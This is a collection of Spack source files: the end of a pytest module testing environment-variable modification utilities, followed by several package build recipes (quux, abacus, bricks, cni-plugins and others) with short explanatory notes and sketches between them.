'lib64': ['LIBRARY_PATH', 'LD_LIBRARY_PATH'],
'include': ['CPATH']
}
env = environment.inspect_path(
'/usr', inspections, exclude=is_system_path
)
assert len(env) == 0
@pytest.fixture()
def prepare_environment_for_tests(working_env):
"""Sets a few dummy variables in the current environment, that will be
useful for the tests below.
"""
os.environ['UNSET_ME'] = 'foo'
os.environ['EMPTY_PATH_LIST'] = ''
os.environ['PATH_LIST'] = '/path/second:/path/third'
os.environ['REMOVE_PATH_LIST'] \
= '/a/b:/duplicate:/a/c:/remove/this:/a/d:/duplicate/:/f/g'
os.environ['PATH_LIST_WITH_SYSTEM_PATHS'] \
= '/usr/include:' + os.environ['REMOVE_PATH_LIST']
os.environ['PATH_LIST_WITH_DUPLICATES'] = os.environ['REMOVE_PATH_LIST']
@pytest.fixture
def env(prepare_environment_for_tests):
"""Returns an empty EnvironmentModifications object."""
return EnvironmentModifications()
@pytest.fixture
def miscellaneous_paths():
"""Returns a list of paths, including system ones."""
return [
'/usr/local/Cellar/gcc/5.3.0/lib',
'/usr/local/lib',
'/usr/local',
'/usr/local/include',
'/usr/local/lib64',
'/usr/local/opt/some-package/lib',
'/usr/opt/lib',
'/usr/local/../bin',
'/lib',
'/',
'/usr',
'/usr/',
'/usr/bin',
'/bin64',
'/lib64',
'/include',
'/include/',
'/opt/some-package/include',
'/opt/some-package/local/..',
]
@pytest.fixture
def files_to_be_sourced():
"""Returns a list of files to be sourced"""
return [
os.path.join(datadir, 'sourceme_first.sh'),
os.path.join(datadir, 'sourceme_second.sh'),
os.path.join(datadir, 'sourceme_parameters.sh'),
os.path.join(datadir, 'sourceme_unicode.sh')
]
def test_set(env):
"""Tests setting values in the environment."""
# Here we are storing the commands to set a couple of variables
env.set('A', 'dummy value')
env.set('B', 3)
# ...and then we are executing them
env.apply_modifications()
assert 'dummy value' == os.environ['A']
assert str(3) == os.environ['B']
def test_append_flags(env):
"""Tests appending to a value in the environment."""
# Store a couple of commands
env.append_flags('APPEND_TO_ME', 'flag1')
env.append_flags('APPEND_TO_ME', 'flag2')
# ... execute the commands
env.apply_modifications()
assert 'flag1 flag2' == os.environ['APPEND_TO_ME']
def test_unset(env):
"""Tests unsetting values in the environment."""
# Assert that the target variable is there and unset it
assert 'foo' == os.environ['UNSET_ME']
env.unset('UNSET_ME')
env.apply_modifications()
    # Trying to retrieve it after deletion should cause a KeyError
with pytest.raises(KeyError):
os.environ['UNSET_ME']
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
def test_filter_system_paths(miscellaneous_paths):
"""Tests that the filtering of system paths works as expected."""
filtered = filter_system_paths(miscellaneous_paths)
expected = [
'/usr/local/Cellar/gcc/5.3.0/lib',
'/usr/local/opt/some-package/lib',
'/usr/opt/lib',
'/opt/some-package/include',
'/opt/some-package/local/..',
]
assert filtered == expected
# TODO 27021
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
def test_set_path(env):
"""Tests setting paths in an environment variable."""
# Check setting paths with the default separator
env.set_path('A', ['foo', 'bar', 'baz'])
env.apply_modifications()
assert 'foo:bar:baz' == os.environ['A']
env.set_path('B', ['foo', 'bar', 'baz'], separator=';')
env.apply_modifications()
assert 'foo;bar;baz' == os.environ['B']
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
def test_path_manipulation(env):
"""Tests manipulating list of paths in the environment."""
env.append_path('PATH_LIST', '/path/last')
env.prepend_path('PATH_LIST', '/path/first')
env.append_path('EMPTY_PATH_LIST', '/path/middle')
env.append_path('EMPTY_PATH_LIST', '/path/last')
env.prepend_path('EMPTY_PATH_LIST', '/path/first')
env.append_path('NEWLY_CREATED_PATH_LIST', '/path/middle')
env.append_path('NEWLY_CREATED_PATH_LIST', '/path/last')
env.prepend_path('NEWLY_CREATED_PATH_LIST', '/path/first')
env.remove_path('REMOVE_PATH_LIST', '/remove/this')
env.remove_path('REMOVE_PATH_LIST', '/duplicate/')
env.deprioritize_system_paths('PATH_LIST_WITH_SYSTEM_PATHS')
env.prune_duplicate_paths('PATH_LIST_WITH_DUPLICATES')
env.apply_modifications()
expected = '/path/first:/path/second:/path/third:/path/last'
assert os.environ['PATH_LIST'] == expected
expected = '/path/first:/path/middle:/path/last'
assert os.environ['EMPTY_PATH_LIST'] == expected
expected = '/path/first:/path/middle:/path/last'
assert os.environ['NEWLY_CREATED_PATH_LIST'] == expected
assert os.environ['REMOVE_PATH_LIST'] == '/a/b:/a/c:/a/d:/f/g'
assert not os.environ['PATH_LIST_WITH_SYSTEM_PATHS'].\
startswith('/usr/include:')
assert os.environ['PATH_LIST_WITH_SYSTEM_PATHS'].endswith(':/usr/include')
assert os.environ['PATH_LIST_WITH_DUPLICATES'].count('/duplicate') == 1
def test_extra_arguments(env):
"""Tests that we can attach extra arguments to any command."""
env.set('A', 'dummy value', who='Pkg1')
for x in env:
assert 'who' in x.args
env.apply_modifications()
assert 'dummy value' == os.environ['A']
def test_extend(env):
"""Tests that we can construct a list of environment modifications
starting from another list.
"""
env.set('A', 'dummy value')
env.set('B', 3)
copy_construct = EnvironmentModifications(env)
assert len(copy_construct) == 2
for x, y in zip(env, copy_construct):
assert x is y
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
@pytest.mark.usefixtures('prepare_environment_for_tests')
def test_source_files(files_to_be_sourced):
"""Tests the construction of a list of environment modifications that are
the result of sourcing a file.
"""
env = EnvironmentModifications()
for filename in files_to_be_sourced:
if filename.endswith('sourceme_parameters.sh'):
env.extend(EnvironmentModifications.from_sourcing_file(
filename, 'intel64'))
else:
env.extend(EnvironmentModifications.from_sourcing_file(filename))
modifications = env.group_by_name()
# This is sensitive to the user's environment; can include
# spurious entries for things like PS1
#
    # TODO: figure out how to make this a bit more robust.
assert len(modifications) >= 5
# Set new variables
assert len(modifications['NEW_VAR']) == 1
assert isinstance(modifications['NEW_VAR'][0], SetEnv)
assert modifications['NEW_VAR'][0].value == 'new'
assert len(modifications['FOO']) == 1
assert isinstance(modifications['FOO'][0], SetEnv)
assert modifications['FOO'][0].value == 'intel64'
# Unset variables
assert len(modifications['EMPTY_PATH_LIST']) == 1
assert isinstance(modifications['EMPTY_PATH_LIST'][0], UnsetEnv)
# Modified variables
assert len(modifications['UNSET_ME']) == 1
assert isinstance(modifications['UNSET_ME'][0], SetEnv)
assert modifications['UNSET_ME'][0].value == 'overridden'
assert len(modifications['PATH_LIST']) == 3
assert isinstance(modifications['PATH_LIST'][0], RemovePath)
assert modifications['PATH_LIST'][0].value == '/path/third'
assert isinstance(modifications['PATH_LIST'][1], AppendPath)
assert modifications['PATH_LIST'][1].value == '/path/fourth'
assert isinstance(modifications['PATH_LIST'][2], PrependPath)
assert modifications['PATH_LIST'][2].value == '/path/first'
@pytest.mark.regression('8345')
def test_preserve_environment(prepare_environment_for_tests):
# UNSET_ME is defined, and will be unset in the context manager,
# NOT_SET is not in the environment and will be set within the
# context manager, PATH_LIST is set and will be changed.
with environment.preserve_environment('UNSET_ME', 'NOT_SET', 'PATH_LIST'):
os.environ['NOT_SET'] = 'a'
assert os.environ['NOT_SET'] == 'a'
del os.environ['UNSET_ME']
assert 'UNSET_ME' not in os.environ
os.environ['PATH_LIST'] = 'changed'
assert 'NOT_SET' not in os.environ
assert os.environ['UNSET_ME'] == 'foo'
assert os.environ['PATH_LIST'] == '/path/second:/path/third'
@pytest.mark.skipif(sys.platform == 'win32',
reason="Not supported on Windows (yet)")
@pytest.mark.parametrize('files,expected,deleted', [
# Sets two variables
((os.path.join(datadir, 'sourceme_first.sh'),),
{'NEW_VAR': 'new', 'UNSET_ME': 'overridden'}, []),
# Check if we can set a variable to different values depending
# on command line parameters
((os.path.join(datadir, 'sourceme_parameters.sh'),),
{'FOO': 'default'}, []),
(([os.path.join(datadir, 'sourceme_parameters.sh'), 'intel64'],),
{'FOO': 'intel64'}, []),
# Check unsetting variables
((os.path.join(datadir, 'sourceme_second.sh'),),
{'PATH_LIST': '/path/first:/path/second:/path/fourth'},
['EMPTY_PATH_LIST']),
# Check that order of sourcing matters
((os.path.join(datadir, 'sourceme_unset.sh'),
os.path.join(datadir, 'sourceme_first.sh')),
{'NEW_VAR': 'new', 'UNSET_ME': 'overridden'}, []),
((os.path.join(datadir, 'sourceme_first.sh'),
os.path.join(datadir, 'sourceme_unset.sh')),
{'NEW_VAR': 'new'}, ['UNSET_ME']),
])
@pytest.mark.usefixtures('prepare_environment_for_tests')
def test_environment_from_sourcing_files(files, expected, deleted):
env = environment.environment_after_sourcing_files(*files)
# Test that variables that have been modified are still there and contain
# the expected output
for name, value in expected.items():
assert name in env
assert value in env[name]
# Test that variables that have been unset are not there
for name in deleted:
assert name not in env
def test_clear(env):
env.set('A', 'dummy value')
assert len(env) > 0
env.clear()
assert len(env) == 0
@pytest.mark.parametrize('env,blacklist,whitelist', [
# Check we can blacklist a literal
({'SHLVL': '1'}, ['SHLVL'], []),
# Check whitelist takes precedence
({'SHLVL': '1'}, ['SHLVL'], ['SHLVL']),
])
def test_sanitize_literals(env, blacklist, whitelist):
after = environment.sanitize(env, blacklist, whitelist)
# Check that all the whitelisted variables are there
assert all(x in after for x in whitelist)
    # Check that the blacklisted variables that are not
    # whitelisted have been removed
blacklist = list(set(blacklist) - set(whitelist))
assert all(x not in after for x in blacklist)
@pytest.mark.parametrize('env,blacklist,whitelist,expected,deleted', [
# Check we can blacklist using a regex
({'SHLVL': '1'}, ['SH.*'], [], [], ['SHLVL']),
# Check we can whitelist using a regex
({'SHLVL': '1'}, ['SH.*'], ['SH.*'], ['SHLVL'], []),
# Check regex to blacklist Modules v4 related vars
({'MODULES_LMALTNAME': '1', 'MODULES_LMCONFLICT': '2'},
['MODULES_(.*)'], [], [], ['MODULES_LMALTNAME', 'MODULES_LMCONFLICT']),
({'A_modquar': '1', 'b_modquar': '2', 'C_modshare': '3'},
[r'(\w*)_mod(quar|share)'], [], [],
['A_modquar', 'b_modquar', 'C_modshare']),
])
def test_sanitize_regex(env, blacklist, whitelist, expected, deleted):
after = environment.sanitize(env, blacklist, whitelist)
assert all(x in after for x in expected)
assert all(x not in after for x in deleted)
@pytest.mark.regression('12085')
@pytest.mark.parametrize('before,after,search_list', [
# Set environment variables
({}, {'FOO': 'foo'}, [environment.SetEnv('FOO', 'foo')]),
# Unset environment variables
({'FOO': 'foo'}, {}, [environment.UnsetEnv('FOO')]),
# Append paths to an environment variable
({'FOO_PATH': '/a/path'}, {'FOO_PATH': '/a/path:/b/path'},
[environment.AppendPath('FOO_PATH', '/b/path')]),
({}, {'FOO_PATH': '/a/path' + os.sep + '/b/path'}, [
environment.AppendPath('FOO_PATH', '/a/path' + os.sep + '/b/path')
]),
({'FOO_PATH': '/a/path:/b/path'}, {'FOO_PATH': '/b/path'}, [
environment.RemovePath('FOO_PATH', '/a/path')
]),
({'FOO_PATH': '/a/path:/b/path'}, {'FOO_PATH': '/a/path:/c/path'}, [
environment.RemovePath('FOO_PATH', '/b/path'),
environment.AppendPath('FOO_PATH', '/c/path')
]),
({'FOO_PATH': '/a/path:/b/path'}, {'FOO_PATH': '/c/path:/a/path'}, [
environment.RemovePath('FOO_PATH', '/b/path'),
environment.PrependPath('FOO_PATH', '/c/path')
]),
# Modify two variables in the same environment
({'FOO': 'foo', 'BAR': 'bar'}, {'FOO': 'baz', 'BAR': 'baz'}, [
environment.SetEnv('FOO', 'baz'),
environment.SetEnv('BAR', 'baz'),
]),
])
def test_from_environment_diff(before, after, search_list):
mod = environment.EnvironmentModifications.from_environment_diff(
before, after
)
for item in search_list:
assert item in mod
@pytest.mark.skipif(sys.platform == 'win32',
reason="LMod not supported on Windows")
@pytest.mark.regression('15775')
def test_blacklist_lmod_variables():
# Construct the list of environment modifications
file = os.path.join(datadir, 'sourceme_lmod.sh')
env = EnvironmentModifications.from_sourcing_file(file)
# Check that variables related to lmod are not in there
modifications = env.group_by_name()
assert not any(x.startswith('LMOD_') for x in modifications)
```
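Several of these tests lean on `EnvironmentModifications.from_environment_diff`, which turns a before/after pair of environments into a list of operations. A pure-python sketch of that diffing idea, using plain tuples instead of Spack's modification classes; note the real implementation also detects path append/prepend/remove, which this simplification reports as plain sets.
```python
# Simplified before/after environment diff, mirroring the cases in
# test_from_environment_diff above (minus the path-aware operations).
def environment_diff(before, after):
    ops = []
    for name in before.keys() - after.keys():
        ops.append(('unset', name))
    for name in after.keys() - before.keys():
        ops.append(('set', name, after[name]))
    for name in before.keys() & after.keys():
        if before[name] != after[name]:
            ops.append(('set', name, after[name]))
    return ops

print(environment_diff({'FOO': 'foo'}, {}))          # [('unset', 'FOO')]
print(environment_diff({}, {'FOO': 'foo'}))          # [('set', 'FOO', 'foo')]
print(environment_diff({'FOO': 'a'}, {'FOO': 'b'}))  # [('set', 'FOO', 'b')]
```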
#### File: packages/gnuconfig/package.py
```python
import os
from spack.package import *
class Gnuconfig(Package):
"""
The GNU config.guess and config.sub scripts versioned by timestamp.
This package can be used as a build dependency for autotools packages that
ship a tarball with outdated config.guess and config.sub files.
"""
has_code = False
version('2021-08-14')
def install(self, spec, prefix):
config_sub = join_path(prefix, 'config.sub')
config_guess = join_path(prefix, 'config.guess')
# Create files
with open(config_sub, 'w') as f:
f.write("#!/bin/sh\necho gnuconfig version of config.sub")
with open(config_guess, 'w') as f:
f.write("#!/bin/sh\necho gnuconfig version of config.guess")
# Make executable
os.chmod(config_sub, 0o775)
os.chmod(config_guess, 0o775)
```
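The install step here is just "write two shell stubs and mark them executable". The same pattern in plain python, against a temporary directory instead of a Spack prefix:
```python
# Write a small script and give it the same 0o775 mode the package uses.
import os
import tempfile

def write_executable(path, text):
    with open(path, 'w') as f:
        f.write(text)
    os.chmod(path, 0o775)  # same mode as the package above

prefix = tempfile.mkdtemp()
stub = os.path.join(prefix, 'config.sub')
write_executable(stub, "#!/bin/sh\necho stub config.sub\n")
print(oct(os.stat(stub).st_mode & 0o777))  # -> 0o775
```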
#### File: packages/quux/package.py
```python
import os
import sys
from spack.package import *
class Quux(Package):
"""Toy package for testing dependencies"""
homepage = "https://www.example.com"
has_code = False
version('3.0.0')
depends_on('garply')
def install(self, spec, prefix):
quux_cc = '''#include "quux.h"
#include "garply/garply.h"
#include "quux_version.h"
#include <iostream>
#include <stdexcept>
const int Quux::version_major = quux_version_major;
const int Quux::version_minor = quux_version_minor;
Quux::Quux() {}
int
Quux::get_version() const
{
return 10 * version_major + version_minor;
}
int
Quux::quuxify() const
{
int quux_version = get_version();
std::cout << "Quux::quuxify version " << quux_version
<< " invoked" <<std::endl;
std::cout << "Quux config directory is %s" <<std::endl;
Garply garply;
int garply_version = garply.garplinate();
if (garply_version != quux_version) {
throw std::runtime_error(
"Quux found an incompatible version of Garply.");
}
return quux_version;
}
'''
quux_h = '''#ifndef QUUX_H_
class Quux
{
private:
static const int version_major;
static const int version_minor;
public:
Quux();
int get_version() const;
int quuxify() const;
};
#endif // QUUX_H_
'''
quuxifier_cc = '''
#include "quux.h"
#include <iostream>
int
main()
{
Quux quux;
quux.quuxify();
return 0;
}
'''
quux_version_h = '''const int quux_version_major = %s;
const int quux_version_minor = %s;
'''
mkdirp('%s/quux' % prefix.include)
mkdirp('%s/quux' % self.stage.source_path)
with open('%s/quux_version.h' % self.stage.source_path, 'w') as f:
f.write(quux_version_h % (self.version[0], self.version[1:]))
with open('%s/quux/quux.cc' % self.stage.source_path, 'w') as f:
f.write(quux_cc % (prefix.config))
with open('%s/quux/quux.h' % self.stage.source_path, 'w') as f:
f.write(quux_h)
with open('%s/quux/quuxifier.cc' % self.stage.source_path, 'w') as f:
f.write(quuxifier_cc)
gpp = which('/usr/bin/g++')
if sys.platform == 'darwin':
gpp = which('/usr/bin/clang++')
gpp('-Dquux_EXPORTS',
'-I%s' % self.stage.source_path,
'-I%s' % spec['garply'].prefix.include,
'-O2', '-g', '-DNDEBUG', '-fPIC',
'-o', 'quux.cc.o',
'-c', 'quux/quux.cc')
gpp('-Dquux_EXPORTS',
'-I%s' % self.stage.source_path,
'-I%s' % spec['garply'].prefix.include,
'-O2', '-g', '-DNDEBUG', '-fPIC',
'-o', 'quuxifier.cc.o',
'-c', 'quux/quuxifier.cc')
if sys.platform == 'darwin':
gpp('-fPIC', '-O2', '-g', '-DNDEBUG',
'-dynamiclib', '-Wl,-headerpad_max_install_names',
                '-o', 'libquux.dylib',
                '-install_name', '@rpath/libquux.dylib',
'quux.cc.o', '-Wl,-rpath,%s' % prefix.lib64,
'-Wl,-rpath,%s' % spec['garply'].prefix.lib64,
'%s/libgarply.dylib' % spec['garply'].prefix.lib64)
gpp('-O2', '-g', '-DNDEBUG',
'quuxifier.cc.o', '-o', 'quuxifier',
'-Wl,-rpath,%s' % prefix.lib64,
'-Wl,-rpath,%s' % spec['garply'].prefix.lib64,
'libquux.dylib',
'%s/libgarply.dylib' % spec['garply'].prefix.lib64)
mkdirp(prefix.lib64)
copy('libquux.dylib', '%s/libquux.dylib' % prefix.lib64)
os.link('%s/libquux.dylib' % prefix.lib64,
'%s/libquux.dylib.3.0' % prefix.lib64)
else:
gpp('-fPIC', '-O2', '-g', '-DNDEBUG', '-shared',
'-Wl,-soname,libquux.so', '-o', 'libquux.so', 'quux.cc.o',
'-Wl,-rpath,%s:%s::::' % (prefix.lib64,
spec['garply'].prefix.lib64),
'%s/libgarply.so' % spec['garply'].prefix.lib64)
gpp('-O2', '-g', '-DNDEBUG', '-rdynamic',
'quuxifier.cc.o', '-o', 'quuxifier',
'-Wl,-rpath,%s:%s::::' % (prefix.lib64,
spec['garply'].prefix.lib64),
'libquux.so',
'%s/libgarply.so' % spec['garply'].prefix.lib64)
mkdirp(prefix.lib64)
copy('libquux.so', '%s/libquux.so' % prefix.lib64)
os.link('%s/libquux.so' % prefix.lib64,
'%s/libquux.so.3.0' % prefix.lib64)
copy('quuxifier', '%s/quuxifier' % prefix.lib64)
copy('%s/quux/quux.h' % self.stage.source_path,
'%s/quux/quux.h' % prefix.include)
mkdirp(prefix.bin)
copy('quux_version.h', '%s/quux_version.h' % prefix.bin)
os.symlink('%s/quuxifier' % prefix.lib64, '%s/quuxifier' % prefix.bin)
os.symlink('%s/garplinator' % spec['garply'].prefix.lib64,
'%s/garplinator' % prefix.bin)
```
#### File: packages/test-install-callbacks/package.py
```python
from spack.package import *
from spack.package_base import run_after
class TestInstallCallbacks(Package):
"""This package illustrates install callback test failure."""
homepage = "http://www.example.com/test-install-callbacks"
url = "http://www.test-failure.test/test-install-callbacks-1.0.tar.gz"
version('1.0', '0123456789abcdef0123456789abcdef')
# Include an undefined callback method
install_time_test_callbacks = ['undefined-install-test', 'test']
run_after('install')(Package._run_default_install_time_test_callbacks)
def install(self, spec, prefix):
mkdirp(prefix.bin)
def test(self):
print('test: test-install-callbacks')
print('PASSED')
```
#### File: packages/abacus/package.py
```python
import re
from spack.package import *
class Abacus(MakefilePackage):
"""ABACUS (Atomic-orbital Based Ab-initio Computation at UStc)
is an open-source computer code package aiming
for large-scale electronic-structure simulations
from first principles"""
maintainers = ["bitllion"]
homepage = "http://abacus.ustc.edu.cn/"
git = "https://github.com/abacusmodeling/abacus-develop.git"
url = "https://github.com/abacusmodeling/abacus-develop/archive/refs/tags/v2.2.1.tar.gz"
version("develop", branch="develop")
version(
"2.2.3",
sha256="88dbf6a3bdd907df3e097637ec8e51fde13e2f5e0b44f3667443195481320edf",
)
version(
"2.2.2",
sha256="4a7cf2ec6e43dd5c53d5f877a941367074f4714d93c1977a719782957916169e",
)
version(
"2.2.1",
sha256="14feca1d8d1ce025d3f263b85ebfbebc1a1efff704b6490e95b07603c55c1d63",
)
version(
"2.2.0",
sha256="09d4a2508d903121d29813a85791eeb3a905acbe1c5664b8a88903f8eda64b8f",
)
variant("openmp", default=True, description="Enable OpenMP support")
depends_on("elpa+openmp", when="+openmp")
depends_on("elpa~openmp", when="~openmp")
depends_on("cereal")
depends_on("libxc")
depends_on("fftw")
# MPI is a necessary dependency
depends_on("mpi", type=("build", "link", "run"))
depends_on("mkl")
build_directory = "source"
def edit(self, spec, prefix):
if "+openmp" in spec:
inc_var = "_openmp-"
            system_var = (
                "ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa_openmp -Wl,-rpath=${ELPA_LIB_DIR}"
            )
else:
inc_var = "-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa -Wl,-rpath=${ELPA_LIB_DIR}"
)
tempInc = (
"\
FORTRAN = ifort\n\
CPLUSPLUS = icpc\n\
CPLUSPLUS_MPI = mpiicpc\n\
LAPACK_DIR = $(MKLROOT)\n\
FFTW_DIR = %s\n\
ELPA_DIR = %s\n\
ELPA_INCLUDE = -I${ELPA_DIR}/include/elpa%s%s\n\
CEREAL_DIR = %s\n\
OBJ_DIR = obj\n\
OBJ_DIR_serial = obj\n\
NP = 14\n"
% (
spec["fftw"].prefix,
spec["elpa"].prefix,
inc_var,
"{0}".format(spec["elpa"].version),
spec["cereal"].prefix,
)
)
with open(self.build_directory + "/Makefile.vars", "w") as f:
f.write(tempInc)
        # Drop any pre-existing ELPA_INCLUDE_DIR / ELPA_LIB lines from
        # Makefile.system before appending our own ELPA_LIB definition.
        pattern1 = re.compile("^ELPA_INCLUDE_DIR")
        pattern2 = re.compile("^ELPA_LIB\\s*= ")
        with open(self.build_directory + "/Makefile.system", "r") as f:
            kept_lines = [line for line in f
                          if not (pattern1.search(line) or pattern2.search(line))]
        with open(self.build_directory + "/Makefile.system", "w") as f:
            f.writelines(kept_lines)
with open(self.build_directory + "/Makefile.system", "a") as f:
f.write(system_var)
def install(self, spec, prefix):
install_tree("bin", prefix.bin)
```
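The `edit()` phase above is a filter-and-append rewrite of `Makefile.system`: drop lines assigning a variable, then append a replacement. A self-contained sketch of that pattern; the file contents and variable name below are made up.
```python
# Filter-and-append rewrite of a Makefile variable, as in edit() above.
import re

def replace_make_var(lines, var, new_assignment):
    pattern = re.compile(r'^%s\s*=' % re.escape(var))
    kept = [line for line in lines if not pattern.search(line)]
    kept.append(new_assignment + '\n')
    return kept

makefile = ['CC = gcc\n', 'ELPA_LIB = -lelpa\n', 'all: prog\n']
print(''.join(replace_make_var(makefile, 'ELPA_LIB',
                               'ELPA_LIB = -L/opt/elpa/lib -lelpa_openmp')))
```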
#### File: packages/adms/package.py
```python
from spack.package import *
class Adms(AutotoolsPackage):
"""ADMS is a code generator that converts electrical compact device models
specified in high-level description language into ready-to-compile c code
for the API of spice simulators."""
homepage = "https://sourceforge.net/projects/mot-adms/"
url = "https://github.com/Qucs/ADMS/releases/download/release-2.3.7/adms-2.3.7.tar.gz"
git = "https://github.com/Qucs/ADMS.git"
maintainers = ['cessenat']
version('master', branch='master')
version('2.3.7', sha256='3a78e1283ecdc3f356410474b3ff44c4dcc82cb89772087fd3bbde8a1038ce08')
depends_on('[email protected]:', type='build')
depends_on('flex', type='build')
depends_on('perl-xml-libxml', type='build')
@when('@master')
def autoreconf(self, spec, prefix):
sh = which('sh')
sh('./bootstrap.sh')
```
#### File: packages/authd/package.py
```python
from spack.package import *
class Authd(MakefilePackage):
"""authd is a small and fast RFC 1413 ident protocol daemon with
both xinetd server and interactive modes that supports IPv6 and
IPv4 as well as the more popular features of pidentd."""
homepage = "https://github.com/InfrastructureServices/authd"
url = "https://github.com/InfrastructureServices/authd/releases/download/v1.4.4/authd-1.4.4.tar.gz"
version('1.4.4', sha256='71ee3d1c3e107c93e082148f75ee460c949b203c861dd20d48f7c5cfdc272bf8')
def setup_run_environment(self, env):
env.prepend_path('PATH', self.prefix.sbin)
def install(self, spec, prefix):
make('prefix={0}'.format(prefix), 'install')
```
#### File: packages/autodock-vina/package.py
```python
import sys
from spack.package import *
class AutodockVina(MakefilePackage):
"""AutoDock Vina is an open-source program for doing molecular docking"""
homepage = "http://vina.scripps.edu/"
url = "https://github.com/ccsb-scripps/AutoDock-Vina/archive/refs/tags/v1.2.3.tar.gz"
version('1.2.3', sha256='22f85b2e770b6acc363429153b9551f56e0a0d88d25f747a40d2f55a263608e0')
version('1.2.2', sha256='b9c28df478f90d64dbbb5f4a53972bddffffb017b7bb58581a1a0034fff1b400')
version('1.2.1', sha256='2d8d9871a5a95265c03c621c0584d9f06b202303116e6c87e23c935f7b694f74')
version('1.2.0', sha256='9c9a85766b4d124d7c1d92e767aa8b4580c6175836b8aa2c28f88a9c40a5b90e')
version('1.1.2', sha256='65422b2240c75d40417872a48e98043e7a7c435300dc8490af0c1f752f1ca4a2',
url='https://github.com/ccsb-scripps/AutoDock-Vina/archive/refs/tags/v1.1.2-boost-new.tar.gz')
depends_on('[email protected]:1.75.0 +filesystem +program_options +serialization +system +thread', when='@1.1.2')
depends_on('[email protected]: +filesystem +program_options +serialization +system +thread', when='@1.2.0:')
@property
def build_directory(self):
if sys.platform == "darwin":
return join_path('build', 'mac', 'release')
else:
return join_path('build', 'linux', 'release')
def edit(self, spec, prefix):
with working_dir(self.build_directory):
makefile = FileFilter('Makefile')
makefile.filter('BOOST_INCLUDE = .*', 'BOOST_INCLUDE = %s' %
self.spec['boost'].prefix.include)
makefile.filter('C_PLATFORM=.*', 'C_PLATFORM=-pthread')
makefile.filter('GPP=.*', 'GPP=%s' % spack_cxx)
def build(self, spec, prefix):
with working_dir(self.build_directory):
make()
def install(self, spec, prefix):
with working_dir(self.build_directory):
mkdirp(prefix.bin)
install('vina', prefix.bin)
install('vina_split', prefix.bin)
```
#### File: packages/bamaddrg/package.py
```python
from spack.package import *
class Bamaddrg(MakefilePackage):
"""bamaddrg adds read groups to input BAM files,
streams BAM output on stdout"""
homepage = "https://github.com/ekg/bamaddrg"
url = "https://github.com/ilbiondo/bamaddrg/archive/v0.1.tar.gz"
git = "https://github.com/ilbiondo/bamaddrg.git"
version('0.1', sha256='725a689d8326d72f865837b231005a9211d6c70a25b7a3a754df4f90d2996355')
depends_on("bamtools", type="build")
def setup_build_environment(self, env):
env.set('BAMTOOLS_ROOT', self.spec['bamtools'].prefix)
env.set('PREFIX', self.prefix)
```
#### File: packages/bricks/package.py
```python
from spack import *
class Bricks(CMakePackage):
"""Bricks is a data layout and code generation framework,
enabling performance-portable stencil computations across
a multitude of architectures."""
homepage = "https://bricks.run/"
git = 'https://github.com/CtopCsUtahEdu/bricklib.git'
test_requires_compiler = True
# List of GitHub accounts to notify when the package is updated.
maintainers = ['ztuowen', 'drhansj']
version('r0.1', branch='r0.1')
variant('cuda', default=False, description='Build bricks with CUDA enabled')
# Building a variant of cmake without openssl is to match how the
# ECP E4S project builds cmake in their e4s-base-cuda Docker image
depends_on('cmake', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('opencl-clhpp', when='+cuda')
depends_on('cuda', when='+cuda')
depends_on('mpi')
def cmake_args(self):
"""CMake arguments for configure stage"""
args = []
return args
def flag_handler(self, name, flags):
"""Set build flags as needed"""
if name in ['cflags', 'cxxflags', 'cppflags']:
            # There are many vector intrinsics used in this package. If
            # the package is built on a native architecture, then it likely
            # will not run (illegal instruction fault) on a less feature-
            # rich architecture.
            # If you intend to use this package in an architecturally-
            # heterogeneous environment, then the package should be built
            # with "target=x86_64". This will ensure that all Intel
            # architectures can use the libraries and tests in this
            # project by forcing the AVX2 flag in gcc.
            if name == 'cxxflags' and self.spec.target == 'x86_64':
                flags.append('-mavx2')
                return (None, flags, None)
        return (flags, None, None)
@run_after('install')
def copy_test_sources(self):
"""Files to copy into test cache"""
srcs = [join_path('examples', 'external', 'CMakeLists.txt'),
join_path('examples', 'external', 'main.cpp'),
join_path('examples', 'external', '7pt.py')]
self.cache_extra_test_sources(srcs)
def test(self):
"""Test bricklib package"""
# Test prebuilt binary
source_dir = join_path(self.test_suite.current_test_cache_dir,
'examples', 'external')
self.run_test(exe='cmake',
options=['.'],
purpose='Configure bricklib example',
work_dir=source_dir)
self.run_test(exe='cmake',
options=['--build', '.'],
purpose='Build bricklib example',
work_dir=source_dir)
self.run_test(exe=join_path(source_dir, 'example'),
options=[],
purpose='Execute bricklib example',
work_dir=source_dir)
```
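The `flag_handler` here relies on Spack's triple-return convention: to the best of my reading, the positions mean (flags injected via the compiler wrappers, flags exported through the build environment, flags passed to the build system), so `(None, flags, None)` routes the modified `cxxflags` through the environment while the final `return (flags, None, None)` keeps the default wrapper injection. A standalone sketch of that dispatch:
```python
# Hypothetical flag_handler sketch; the triple layout is assumed to be
# (wrapper_flags, env_flags, build_system_flags), per the package above.
def flag_handler(name, flags):
    if name == 'cxxflags':
        flags = flags + ['-mavx2']
        # hand the modified cxxflags over via the build environment
        return (None, flags, None)
    # everything else goes through the compiler wrappers unchanged
    return (flags, None, None)

print(flag_handler('cxxflags', ['-O2']))  # (None, ['-O2', '-mavx2'], None)
print(flag_handler('cflags', ['-O2']))    # (['-O2'], None, None)
```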
#### File: packages/cni-plugins/package.py
```python
from spack.package import *
class CniPlugins(Package):
"""Standard networking plugins for container networking"""
homepage = 'https://github.com/containernetworking/plugins'
url = 'https://github.com/containernetworking/plugins/archive/v1.0.1.tar.gz'
maintainers = ['bernhardkaindl']
version('1.0.1', sha256='2ba3cd9f341a7190885b60d363f6f23c6d20d975a7a0ab579dd516f8c6117619')
depends_on('go', type='build')
def install(self, spec, prefix):
utils = 'github.com/containernetworking/plugins/pkg/utils/buildversion'
which('./build_linux.sh')(
'-ldflags',
'-extldflags -static -X {0}.BuildVersion={1}'.format(utils, self.version),
)
install_tree('bin', prefix.bin)
```
#### File: packages/cray-libsci/package.py
```python
from spack.package import *
from spack.util.module_cmd import get_path_args_from_module_line, module
class CrayLibsci(Package):
"""The Cray Scientific Libraries package, LibSci, is a collection of
numerical routines optimized for best performance on Cray systems."""
homepage = "https://docs.nersc.gov/development/libraries/libsci/"
